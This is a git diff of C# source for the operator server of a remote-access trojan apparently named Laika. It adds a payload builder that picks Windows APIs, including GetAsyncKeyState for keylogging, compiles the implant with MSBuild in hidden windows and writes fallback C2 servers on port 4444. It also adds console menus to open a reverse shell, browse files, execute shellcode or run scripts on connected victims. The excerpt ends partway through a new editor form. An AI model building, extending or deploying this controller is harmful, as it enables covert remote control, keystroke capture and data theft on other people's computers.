this.Controls.Add(this.pictureBox1); this.Controls.Add(this.button3); @@ -320,7 +413,8 @@ this.Controls.Add(this.label1); this.Controls.Add(this.textBox1); this.Controls.Add(this.Hosts); - this.MinimumSize = new System.Drawing.Size(371, 430); + this.MaximumSize = new System.Drawing.Size(719, 504); + this.MinimumSize = new System.Drawing.Size(719, 504); this.Name = "BuildMenu"; this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent; this.Text = "Build a payload"; @@ -329,6 +423,7 @@ ((System.ComponentModel.ISupportInitialize)(this.numericUpDown1)).EndInit(); ((System.ComponentModel.ISupportInitialize)(this.numericUpDown2)).EndInit(); ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit(); + this.contextMenuStrip2.ResumeLayout(false); this.ResumeLayout(false); this.PerformLayout(); @@ -360,5 +455,14 @@ private System.Windows.Forms.Button button3; private System.Windows.Forms.PictureBox pictureBox1; private System.Windows.Forms.Label label9; + private System.Windows.Forms.Label label10; + private System.Windows.Forms.Label label11; + private System.Windows.Forms.Label label12; + private System.Windows.Forms.ListBox Selected_apis; + private System.Windows.Forms.TextBox searchBox; + private System.Windows.Forms.ListBox searchResultsListBox; + private System.Windows.Forms.Label label13; + private System.Windows.Forms.ContextMenuStrip contextMenuStrip2; + private System.Windows.Forms.ToolStripMenuItem toolStripMenuItem1; } } \ No newline at end of file diff --git a/Server/BuildMenu.cs b/Server/BuildMenu.cs index afeb914..ba91d79 100644 --- a/Server/BuildMenu.cs +++ b/Server/BuildMenu.cs @@ -8,14 +8,97 @@ using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; +using System.Text.Json; namespace Server -{ +{ public partial class BuildMenu : Form { + private List apis; + public BuildMenu() { InitializeComponent(); + LoadApis(); + SetPlaceholder(); + searchBox.GotFocus += searchBox_GotFocus; + searchBox.LostFocus += searchBox_LostFocus; + } + + private void SetPlaceholder() + { + searchBox.Text = "Search for an API"; + searchBox.ForeColor = Color.Gray; + } + + private void searchBox_GotFocus(object sender, EventArgs e) + { + if (searchBox.Text == "Search for an API") + { + searchBox.Text = ""; + searchBox.ForeColor = Color.Black; + } + } + + private void searchBox_LostFocus(object sender, EventArgs e) + { + if (string.IsNullOrWhiteSpace(searchBox.Text)) + { + SetPlaceholder(); + } + } + + private void LoadApis() + { + string filePath = "../data/win_apis.json"; + if (File.Exists(filePath)) + { + string jsonContent = File.ReadAllText(filePath); + apis = JsonSerializer.Deserialize>(jsonContent); + + int maxItems = apis.Count; + for (int i = 0; i < maxItems; i++) + { + searchResultsListBox.Items.Add(apis[i].function_name); + } + + Selected_apis.Items.Add("VirtualAlloc"); + Selected_apis.Items.Add("VirtualFree"); + Selected_apis.Items.Add("GetAsyncKeyState"); + } + else + { + MessageBox.Show("API file not found!"); + } + } + + private void SearchBox_TextChanged(object sender, EventArgs e) + { + string searchText = searchBox.Text.ToLower(); + if (searchText == "search for an api" || searchText == "") + return; + + searchResultsListBox.Items.Clear(); + + var filteredApis = apis.Where(api => api.function_name.ToLower().Contains(searchText)).ToList(); + + foreach (var api in filteredApis) + { + searchResultsListBox.Items.Add(api.function_name); + } + } + + private void SearchResultsListBox_SelectedIndexChanged(object sender, EventArgs e) + { + if (searchResultsListBox.SelectedItem != null) + { + string selectedFunctionName = searchResultsListBox.SelectedItem.ToString(); + + if (!Selected_apis.Items.Contains(selectedFunctionName)) + { + Selected_apis.Items.Add(selectedFunctionName); + } + } } private void BuildMenu_Load(object sender, EventArgs e) @@ -53,12 +136,183 @@ namespace Server button2.Enabled = false; } + private void AppendApisToAPIC() + { + string filePath = "../pasm/src/api.c"; + string marker = "// generated APIs here"; + + string fileContent = File.ReadAllText(filePath); + + int markerPosition = fileContent.IndexOf(marker); + if (markerPosition == -1) + { + MessageBox.Show($"Marker '{marker}' not found in the file."); + return; + } + + string newContent = fileContent.Substring(0, markerPosition + marker.Length) + "\n"; + using (StreamWriter sw = new StreamWriter(filePath, false)) // Overwrite the file + { + sw.Write(newContent); + + foreach (var selectedItem in Selected_apis.Items) + { + string functionName = selectedItem.ToString(); + var api = apis.FirstOrDefault(a => a.function_name == functionName); + if (api == null) continue; + + bool returnsVoid = api.full_prototype.StartsWith("void"); + + StringBuilder functionBody = new StringBuilder(); + StringBuilder functionCallArgs = new StringBuilder(); + StringBuilder typedefArgs = new StringBuilder(); + + for(int j = 0; j < api.arguments.Count; j++) + { + string argType = api.arguments[j]; + + typedefArgs.Append(argType); + + if ((j + 1) < api.arguments.Count) + { + typedefArgs.Append(", "); + } + } + + for (int i = 0; i < api.arguments.Count; i++) + { + string argName = $"arg{i}"; + string argType = api.arguments[i]; + + functionBody.AppendLine($" long long {argName} = state->STACK[state->STACK_IDX--];"); + + if (functionCallArgs.Length > 0) + { + functionCallArgs.Append(", "); + } + + functionCallArgs.Append($"({argType}){argName}"); + } + + string functionCall = returnsVoid + ? $"{functionName}({functionCallArgs.ToString()});" + : $"state->registers->eax = (long long)p{functionName}({functionCallArgs.ToString()});"; + + string functionCode = $@" +#ifdef _WIN32 + typedef {api.full_prototype.Split(' ')[0]}(WINAPI *f{api.function_name})({typedefArgs.ToString()}); +#endif +void api_{functionName}(void) {{ +#ifdef _WIN32 + f{api.function_name} p{api.function_name} = GetApi(L""{api.dll_name}"", ""{api.function_name}""); +{functionBody.ToString()} {functionCall} +#else + state->STACK_IDX -= {api.arguments.Count}; + {(returnsVoid ? string.Empty : "state->registers->eax = 1;")} +#endif +}} +"; + sw.WriteLine(functionCode); + } + } + } + + private void UpdateApiHeaderFile() + { + string filePath = "../pasm/src/api.h"; + string markerStart = "// generated APIs here"; + string markerEnd = "//end"; + + string fileContent = File.ReadAllText(filePath); + + int startMarkerPosition = fileContent.IndexOf(markerStart); + int endMarkerPosition = fileContent.IndexOf(markerEnd, startMarkerPosition); + + if (startMarkerPosition == -1 || endMarkerPosition == -1) + { + MessageBox.Show($"Markers '{markerStart}' or '{markerEnd}' not found in the file."); + return; + } + + string contentBeforeMarkers = fileContent.Substring(0, startMarkerPosition + markerStart.Length) + "\n"; + string contentAfterMarkers = fileContent.Substring(endMarkerPosition); + + StringBuilder prototypes = new StringBuilder(); + StringBuilder apiMapEntries = new StringBuilder(); + + foreach (var selectedItem in Selected_apis.Items) + { + string functionName = selectedItem.ToString(); + prototypes.AppendLine($"void api_{functionName}();"); + + apiMapEntries.AppendLine($" {{.command = \"{functionName}\", .fptr = api_{functionName}}},"); + } + + string newContent = contentBeforeMarkers + prototypes.ToString() + "\n" + contentAfterMarkers; + + int apiMapStartMarkerPosition = newContent.IndexOf(markerStart, startMarkerPosition + markerStart.Length); + int apiMapEndMarkerPosition = newContent.IndexOf(markerEnd, apiMapStartMarkerPosition); + + string newApiMapContent = newContent.Substring(0, apiMapStartMarkerPosition + markerStart.Length) + "\n" + + apiMapEntries.ToString() + "\n" + + newContent.Substring(apiMapEndMarkerPosition); + + File.WriteAllText(filePath, newApiMapContent); + + } + private void button2_Click(object sender, EventArgs e) { string output = ""; - button2.Text = "Building..."; + + button2.Text = "Writing APIs to pasm..."; button2.Update(); + AppendApisToAPIC(); + UpdateApiHeaderFile(); + + button2.Text = "Building pasm..."; + button2.Update(); + + System.Diagnostics.Process process = new System.Diagnostics.Process(); + System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); + startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; + startInfo.FileName = "cmd.exe"; + startInfo.Arguments = "/C \"\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\"\" -nologo -latest -property installationPath"; + startInfo.RedirectStandardOutput = true; + startInfo.UseShellExecute = false; + startInfo.CreateNoWindow = true; + process.StartInfo = startInfo; + process.Start(); + string vs_path = process.StandardOutput.ReadToEnd(); + process.WaitForExit(); + + vs_path = vs_path.Replace("\r\n", ""); + string cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe"; + + startInfo.Arguments = "/C \"\"" + cmd_line + "\"\" ../pasm/msvc/pasm.vcxproj /p:Configuration=Release;Platform=x86 /p:LaikaBuild=true"; + startInfo.RedirectStandardError = true; + process.StartInfo = startInfo; + process.Start(); + output += process.StandardOutput.ReadToEnd(); + output += process.StandardError.ReadToEnd(); + + process.WaitForExit(); + + button2.Text = "Building Laika..."; + button2.Update(); + + /* + startInfo.Arguments = "/C \"\"" + cmd_line + "\"\" ../Laika /p:Configuration=Release;Platform=x86"; + startInfo.RedirectStandardError = true; + process.StartInfo = startInfo; + process.Start(); + output += process.StandardOutput.ReadToEnd(); + output += process.StandardError.ReadToEnd(); + + process.WaitForExit(); + */ + string filePath = @"..\Laika\config.h"; string newContent = @"#define FALLBACK_SERVERS " + Hosts.Items.Count; newContent += "\n\nchar* fallback_servers[FALLBACK_SERVERS] = {\n"; @@ -72,24 +326,8 @@ namespace Server { newContent += "\t4444,\n"; } - newContent += "};"; - + newContent += "};"; File.WriteAllText(filePath, newContent); - System.Diagnostics.Process process = new System.Diagnostics.Process(); - System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); - startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; - startInfo.FileName = "cmd.exe"; - startInfo.Arguments = "/C \"\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\"\" -nologo -latest -property installationPath"; - startInfo.RedirectStandardOutput = true; - startInfo.UseShellExecute = false; - startInfo.CreateNoWindow = true; - process.StartInfo = startInfo; - process.Start(); - string vs_path = process.StandardOutput.ReadToEnd(); - process.WaitForExit(); - - vs_path = vs_path.Replace("\r\n", ""); - string cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe"; startInfo.Arguments = "/C \"\"" + cmd_line + "\"\" ../Laika /p:Configuration=Release;Platform=x86"; startInfo.RedirectStandardError = true; @@ -175,5 +413,33 @@ namespace Server label6.Enabled = checkBox4.Checked; numericUpDown2.Enabled = checkBox4.Checked; } + + private void toolStripMenuItem1_Click(object sender, EventArgs e) + { + Selected_apis.Items.RemoveAt(Selected_apis.SelectedIndex); + if (Selected_apis.Items.Count == 0) + button2.Enabled = false; + } + + private void Selected_apis_MouseDown(object sender, MouseEventArgs e) + { + if (e.Button == MouseButtons.Right) + { + int index = Selected_apis.IndexFromPoint(e.Location); + if (index < 0) + return; + + Selected_apis.SelectedIndex = index; + contextMenuStrip2.Show(Cursor.Position); + } + } + } + + public class ApiInfo + { + public string function_name { get; set; } + public List arguments { get; set; } + public string dll_name { get; set; } + public string full_prototype { get; set; } } } diff --git a/Server/BuildMenu.resx b/Server/BuildMenu.resx index ad53752..8baf68f 100644 --- a/Server/BuildMenu.resx +++ b/Server/BuildMenu.resx @@ -120,4 +120,7 @@ 17, 17 + + 172, 17 + \ No newline at end of file diff --git a/Server/FileExplorer.cs b/Server/FileExplorer.cs index 2d9dd6c..c42ad3b 100644 --- a/Server/FileExplorer.cs +++ b/Server/FileExplorer.cs @@ -23,7 +23,7 @@ namespace Server } public static int ITEM_ID = 0; - public static int CLIENT_ID = 0; + public static int CLIENT_ID = -1; public static string PATH = ""; public static bool OPENED = false; @@ -83,8 +83,6 @@ namespace Server dataGridView2.Rows[idx].Tag += "/f"; } } - - c.Client.Blocking = false; } catch { CLIENT_ID = -1; @@ -114,7 +112,6 @@ namespace Server int bytesRead; bytesRead = stream.Read(buffer, 0, buffer.Length); receivedData = System.Text.Encoding.UTF8.GetString(buffer, 0, bytesRead); - c.Client.Blocking = false; } catch { CLIENT_ID = -1; @@ -194,8 +191,6 @@ namespace Server stream.Write(Message, 0, Message.Length); Message = System.Text.Encoding.UTF8.GetBytes(Utils.CAESAR(PATH + file)); stream.Write(Message, 0, Message.Length); - - c.Client.Blocking = false; } catch { @@ -259,6 +254,7 @@ namespace Server private void FileExplorer_FormClosing(object sender, FormClosingEventArgs e) { + CLIENT_ID = -1; OPENED = false; } @@ -288,8 +284,6 @@ namespace Server stream.Write(Message, 0, Message.Length); Message = System.Text.Encoding.UTF8.GetBytes(Utils.CAESAR(PATH + file)); stream.Write(Message, 0, Message.Length); - - c.Client.Blocking = false; } catch { @@ -328,8 +322,6 @@ namespace Server stream.Write(Message, 0, Message.Length); byte[] fileContent = File.ReadAllBytes(filePath); stream.Write(fileContent, 0, fileContent.Length); - - c.Client.Blocking = false; } catch { @@ -455,8 +447,6 @@ namespace Server { DownloadFile(PATH + file, stream, c); } - - c.Client.Blocking = false; } catch { diff --git a/Server/Menu.Designer.cs b/Server/Menu.Designer.cs index b87dd0b..79cc819 100644 --- a/Server/Menu.Designer.cs +++ b/Server/Menu.Designer.cs @@ -29,9 +29,9 @@ private void InitializeComponent() { this.components = new System.ComponentModel.Container(); - System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle1 = new System.Windows.Forms.DataGridViewCellStyle(); - System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle2 = new System.Windows.Forms.DataGridViewCellStyle(); - System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle3 = new System.Windows.Forms.DataGridViewCellStyle(); + System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle7 = new System.Windows.Forms.DataGridViewCellStyle(); + System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle8 = new System.Windows.Forms.DataGridViewCellStyle(); + System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle9 = new System.Windows.Forms.DataGridViewCellStyle(); this.menuStrip1 = new System.Windows.Forms.MenuStrip(); this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.exitToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); @@ -41,9 +41,13 @@ this.Id = new System.Windows.Forms.DataGridViewTextBoxColumn(); this.IPAddress = new System.Windows.Forms.DataGridViewTextBoxColumn(); this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components); + this.label1 = new System.Windows.Forms.Label(); + this.pasmToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.editorToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.shellToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.fileExplorerToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.shellcodeToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.executePasmScriptToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.menuStrip1.SuspendLayout(); ((System.ComponentModel.ISupportInitialize)(this.dataGridView1)).BeginInit(); this.contextMenuStrip1.SuspendLayout(); @@ -54,7 +58,8 @@ this.menuStrip1.BackColor = System.Drawing.SystemColors.Menu; this.menuStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { this.toolStripMenuItem1, - this.payloadToolStripMenuItem}); + this.payloadToolStripMenuItem, + this.pasmToolStripMenuItem}); this.menuStrip1.Location = new System.Drawing.Point(0, 0); this.menuStrip1.Name = "menuStrip1"; this.menuStrip1.Size = new System.Drawing.Size(591, 24); @@ -102,27 +107,27 @@ | System.Windows.Forms.AnchorStyles.Right))); this.dataGridView1.BackgroundColor = System.Drawing.SystemColors.HighlightText; this.dataGridView1.ColumnHeadersBorderStyle = System.Windows.Forms.DataGridViewHeaderBorderStyle.Single; - dataGridViewCellStyle1.Alignment = System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft; - dataGridViewCellStyle1.BackColor = System.Drawing.SystemColors.Control; - dataGridViewCellStyle1.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); - dataGridViewCellStyle1.ForeColor = System.Drawing.SystemColors.WindowText; - dataGridViewCellStyle1.SelectionBackColor = System.Drawing.SystemColors.Control; - dataGridViewCellStyle1.SelectionForeColor = System.Drawing.SystemColors.Control; - dataGridViewCellStyle1.WrapMode = System.Windows.Forms.DataGridViewTriState.True; - this.dataGridView1.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle1; + dataGridViewCellStyle7.Alignment = System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft; + dataGridViewCellStyle7.BackColor = System.Drawing.SystemColors.Control; + dataGridViewCellStyle7.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); + dataGridViewCellStyle7.ForeColor = System.Drawing.SystemColors.WindowText; + dataGridViewCellStyle7.SelectionBackColor = System.Drawing.SystemColors.Control; + dataGridViewCellStyle7.SelectionForeColor = System.Drawing.SystemColors.Control; + dataGridViewCellStyle7.WrapMode = System.Windows.Forms.DataGridViewTriState.True; + this.dataGridView1.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle7; this.dataGridView1.ColumnHeadersHeight = 30; this.dataGridView1.ColumnHeadersHeightSizeMode = System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.DisableResizing; this.dataGridView1.Columns.AddRange(new System.Windows.Forms.DataGridViewColumn[] { this.Id, this.IPAddress}); - dataGridViewCellStyle2.Alignment = System.Windows.Forms.DataGridViewContentAlignment.TopLeft; - dataGridViewCellStyle2.BackColor = System.Drawing.SystemColors.Window; - dataGridViewCellStyle2.Font = new System.Drawing.Font("Microsoft Sans Serif", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); - dataGridViewCellStyle2.ForeColor = System.Drawing.SystemColors.ControlText; - dataGridViewCellStyle2.SelectionBackColor = System.Drawing.SystemColors.Highlight; - dataGridViewCellStyle2.SelectionForeColor = System.Drawing.SystemColors.HighlightText; - dataGridViewCellStyle2.WrapMode = System.Windows.Forms.DataGridViewTriState.False; - this.dataGridView1.DefaultCellStyle = dataGridViewCellStyle2; + dataGridViewCellStyle8.Alignment = System.Windows.Forms.DataGridViewContentAlignment.TopLeft; + dataGridViewCellStyle8.BackColor = System.Drawing.SystemColors.Window; + dataGridViewCellStyle8.Font = new System.Drawing.Font("Microsoft Sans Serif", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); + dataGridViewCellStyle8.ForeColor = System.Drawing.SystemColors.ControlText; + dataGridViewCellStyle8.SelectionBackColor = System.Drawing.SystemColors.Highlight; + dataGridViewCellStyle8.SelectionForeColor = System.Drawing.SystemColors.HighlightText; + dataGridViewCellStyle8.WrapMode = System.Windows.Forms.DataGridViewTriState.False; + this.dataGridView1.DefaultCellStyle = dataGridViewCellStyle8; this.dataGridView1.EnableHeadersVisualStyles = false; this.dataGridView1.GridColor = System.Drawing.SystemColors.ScrollBar; this.dataGridView1.Location = new System.Drawing.Point(12, 28); @@ -132,12 +137,12 @@ this.dataGridView1.ReadOnly = true; this.dataGridView1.RowHeadersVisible = false; this.dataGridView1.RowHeadersWidthSizeMode = System.Windows.Forms.DataGridViewRowHeadersWidthSizeMode.DisableResizing; - dataGridViewCellStyle3.Alignment = System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft; - this.dataGridView1.RowsDefaultCellStyle = dataGridViewCellStyle3; + dataGridViewCellStyle9.Alignment = System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft; + this.dataGridView1.RowsDefaultCellStyle = dataGridViewCellStyle9; this.dataGridView1.RowTemplate.ReadOnly = true; this.dataGridView1.RowTemplate.Resizable = System.Windows.Forms.DataGridViewTriState.False; this.dataGridView1.SelectionMode = System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect; - this.dataGridView1.Size = new System.Drawing.Size(567, 302); + this.dataGridView1.Size = new System.Drawing.Size(567, 295); this.dataGridView1.TabIndex = 1; this.dataGridView1.TabStop = false; this.dataGridView1.CellContentClick += new System.Windows.Forms.DataGridViewCellEventHandler(this.dataGridView1_CellContentClick); @@ -164,15 +169,40 @@ this.contextMenuStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { this.shellToolStripMenuItem, this.fileExplorerToolStripMenuItem, - this.shellcodeToolStripMenuItem}); + this.shellcodeToolStripMenuItem, + this.executePasmScriptToolStripMenuItem}); this.contextMenuStrip1.Name = "contextMenuStrip1"; - this.contextMenuStrip1.Size = new System.Drawing.Size(169, 70); + this.contextMenuStrip1.Size = new System.Drawing.Size(189, 92); + // + // label1 + // + this.label1.AutoSize = true; + this.label1.Location = new System.Drawing.Point(10, 325); + this.label1.Name = "label1"; + this.label1.Size = new System.Drawing.Size(61, 13); + this.label1.TabIndex = 2; + this.label1.Text = "Listening at"; + // + // pasmToolStripMenuItem + // + this.pasmToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.editorToolStripMenuItem}); + this.pasmToolStripMenuItem.Name = "pasmToolStripMenuItem"; + this.pasmToolStripMenuItem.Size = new System.Drawing.Size(48, 20); + this.pasmToolStripMenuItem.Text = "pasm"; + // + // editorToolStripMenuItem + // + this.editorToolStripMenuItem.Name = "editorToolStripMenuItem"; + this.editorToolStripMenuItem.Size = new System.Drawing.Size(105, 22); + this.editorToolStripMenuItem.Text = "Editor"; + this.editorToolStripMenuItem.Click += new System.EventHandler(this.editorToolStripMenuItem_Click); // // shellToolStripMenuItem // this.shellToolStripMenuItem.Image = global::Server.Properties.Resources.terminal; this.shellToolStripMenuItem.Name = "shellToolStripMenuItem"; - this.shellToolStripMenuItem.Size = new System.Drawing.Size(168, 22); + this.shellToolStripMenuItem.Size = new System.Drawing.Size(188, 22); this.shellToolStripMenuItem.Text = "Reverse shell"; this.shellToolStripMenuItem.Click += new System.EventHandler(this.ReverseShellToolStripMenuItem_Click); // @@ -180,7 +210,7 @@ // this.fileExplorerToolStripMenuItem.Image = global::Server.Properties.Resources.folder; this.fileExplorerToolStripMenuItem.Name = "fileExplorerToolStripMenuItem"; - this.fileExplorerToolStripMenuItem.Size = new System.Drawing.Size(168, 22); + this.fileExplorerToolStripMenuItem.Size = new System.Drawing.Size(188, 22); this.fileExplorerToolStripMenuItem.Text = "File Explorer"; this.fileExplorerToolStripMenuItem.Click += new System.EventHandler(this.fileExplorerToolStripMenuItem_Click); // @@ -188,19 +218,30 @@ // this.shellcodeToolStripMenuItem.Image = global::Server.Properties.Resources.execute; this.shellcodeToolStripMenuItem.Name = "shellcodeToolStripMenuItem"; - this.shellcodeToolStripMenuItem.Size = new System.Drawing.Size(168, 22); + this.shellcodeToolStripMenuItem.Size = new System.Drawing.Size(188, 22); this.shellcodeToolStripMenuItem.Text = "Execute shellcode"; this.shellcodeToolStripMenuItem.Click += new System.EventHandler(this.ExecuteShellcodeToolStripMenuItem_Click); // + // executePasmScriptToolStripMenuItem + // + this.executePasmScriptToolStripMenuItem.Image = global::Server.Properties.Resources.scenario; + this.executePasmScriptToolStripMenuItem.Name = "executePasmScriptToolStripMenuItem"; + this.executePasmScriptToolStripMenuItem.Size = new System.Drawing.Size(188, 22); + this.executePasmScriptToolStripMenuItem.Text = "Execute a pasm script"; + this.executePasmScriptToolStripMenuItem.Click += new System.EventHandler(this.executePasmScriptToolStripMenuItem_Click); + // // Menu // this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.AutoScroll = true; this.ClientSize = new System.Drawing.Size(591, 342); + this.Controls.Add(this.label1); this.Controls.Add(this.dataGridView1); this.Controls.Add(this.menuStrip1); this.MainMenuStrip = this.menuStrip1; + this.MaximizeBox = false; + this.MaximumSize = new System.Drawing.Size(607, 381); this.MinimumSize = new System.Drawing.Size(607, 381); this.Name = "Menu"; this.SizeGripStyle = System.Windows.Forms.SizeGripStyle.Show; @@ -229,6 +270,10 @@ private System.Windows.Forms.ToolStripMenuItem shellToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem fileExplorerToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem shellcodeToolStripMenuItem; + private System.Windows.Forms.Label label1; + private System.Windows.Forms.ToolStripMenuItem pasmToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem editorToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem executePasmScriptToolStripMenuItem; } } diff --git a/Server/Menu.cs b/Server/Menu.cs index ce8eb6a..ff74747 100644 --- a/Server/Menu.cs +++ b/Server/Menu.cs @@ -11,6 +11,7 @@ using System.Text; using System.Threading.Tasks; using System.Windows.Forms; using System.Threading; +using System.Runtime.CompilerServices; namespace Server { @@ -24,11 +25,13 @@ namespace Server public static TcpListener server; public static int CLIENT_ID; public static List CONNECT_CLIENTS = new List(); + public static string localip; + public static int localport; public static void ServerStart() { - string localIPAddress = "192.168.56.1";//Dns.GetHostEntry(Dns.GetHostName()).AddressList[0].ToString(); - int port = 4444; - server = new TcpListener(System.Net.IPAddress.Parse(localIPAddress), port); + localip = Dns.GetHostEntry(Dns.GetHostName()).AddressList.FirstOrDefault(ip => ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork).ToString(); + localport = 4444; + server = new TcpListener(System.Net.IPAddress.Parse(localip), localport); server.Start(); } public static void ServerStop() @@ -48,7 +51,7 @@ namespace Server { continue; } - client.Client.Blocking = false; + client.Client.Blocking = true; for (int i = 0; i < dataGridView1.Rows.Count; i++) { if (dataGridView1.Rows[i].Cells[1].Value.ToString() == client.Client.RemoteEndPoint.ToString().Split(':')[0]) @@ -133,6 +136,7 @@ namespace Server private void Form1_Load(object sender, EventArgs e) { dataGridView1.ClearSelection(); + label1.Text = "Listening at " + localip + ":" + localport.ToString(); } private void toolStripMenuItem1_Click(object sender, EventArgs e) @@ -227,8 +231,18 @@ namespace Server { MessageBox.Show("Client timed out."); } + } - c.Client.Blocking = false; + private void editorToolStripMenuItem_Click(object sender, EventArgs e) + { + PasmEditor pasm = new PasmEditor(false); + pasm.Show(this); + } + + private void executePasmScriptToolStripMenuItem_Click(object sender, EventArgs e) + { + PasmEditor pasm = new PasmEditor(true); + pasm.Show(this); } } } diff --git a/Server/PasmEditor.Designer.cs b/Server/PasmEditor.Designer.cs new file mode 100644 index 0000000..4e04671 --- /dev/null +++ b/Server/PasmEditor.Designer.cs @@ -0,0 +1,193 @@ +namespace Server +{ + partial class PasmEditor + { + /// + /// Required designer variable. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// Clean up any resources being used. + /// + /// true if managed resources should be disposed; otherwise, false. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form Designer generated code + + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + private void InitializeComponent() + { + this.menuStrip1 = new System.Windows.Forms.MenuStrip(); + this.fileToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.newCTRLNToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.openToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.saveToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.saveAsCTRLMajSToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.closeCTRLToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.codeToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.executeToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.richTextBox1 = new System.Windows.Forms.RichTextBox(); + this.textBox1 = new System.Windows.Forms.TextBox(); + this.splitter1 = new System.Windows.Forms.Splitter(); + this.menuStrip1.SuspendLayout(); + this.SuspendLayout(); + // + // menuStrip1 + // + this.menuStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.fileToolStripMenuItem, + this.codeToolStripMenuItem}); + this.menuStrip1.Location = new System.Drawing.Point(0, 0); + this.menuStrip1.Name = "menuStrip1"; + this.menuStrip1.Size = new System.Drawing.Size(800, 24); + this.menuStrip1.TabIndex = 0; + this.menuStrip1.Text = "menuStrip1"; + // + // fileToolStripMenuItem + // + this.fileToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.newCTRLNToolStripMenuItem, + this.openToolStripMenuItem, + this.saveToolStripMenuItem, + this.saveAsCTRLMajSToolStripMenuItem, + this.closeCTRLToolStripMenuItem}); + this.fileToolStripMenuItem.Name = "fileToolStripMenuItem"; + this.fileToolStripMenuItem.Size = new System.Drawing.Size(37, 20); + this.fileToolStripMenuItem.Text = "File"; + // + // newCTRLNToolStripMenuItem + // + this.newCTRLNToolStripMenuItem.Name = "newCTRLNToolStripMenuItem"; + this.newCTRLNToolStripMenuItem.ShortcutKeys = ((System.Windows.Forms.Keys)((System.Windows.Forms.Keys.Control | System.Windows.Forms.Keys.N))); + this.newCTRLNToolStripMenuItem.Size = new System.Drawing.Size(180, 22); + this.newCTRLNToolStripMenuItem.Text = "New"; + this.newCTRLNToolStripMenuItem.Click += new System.EventHandler(this.newCTRLNToolStripMenuItem_Click); + // + // openToolStripMenuItem + // + this.openToolStripMenuItem.Name = "openToolStripMenuItem"; + this.openToolStripMenuItem.ShortcutKeys = ((System.Windows.Forms.Keys)((System.Windows.Forms.Keys.Control | System.Windows.Forms.Keys.O))); + this.openToolStripMenuItem.Size = new System.Drawing.Size(180, 22); + this.openToolStripMenuItem.Text = "Open"; + this.openToolStripMenuItem.Click += new System.EventHandler(this.openToolStripMenuItem_Click); + // + // saveToolStripMenuItem + // + this.saveToolStripMenuItem.Name = "saveToolStripMenuItem"; + this.saveToolStripMenuItem.ShortcutKeys = ((System.Windows.Forms.Keys)((System.Windows.Forms.Keys.Control | System.Windows.Forms.Keys.S))); + this.saveToolStripMenuItem.Size = new System.Drawing.Size(180, 22); + this.saveToolStripMenuItem.Text = "Save"; + this.saveToolStripMenuItem.Click += new System.EventHandler(this.saveToolStripMenuItem_Click); + // + // saveAsCTRLMajSToolStripMenuItem + // + 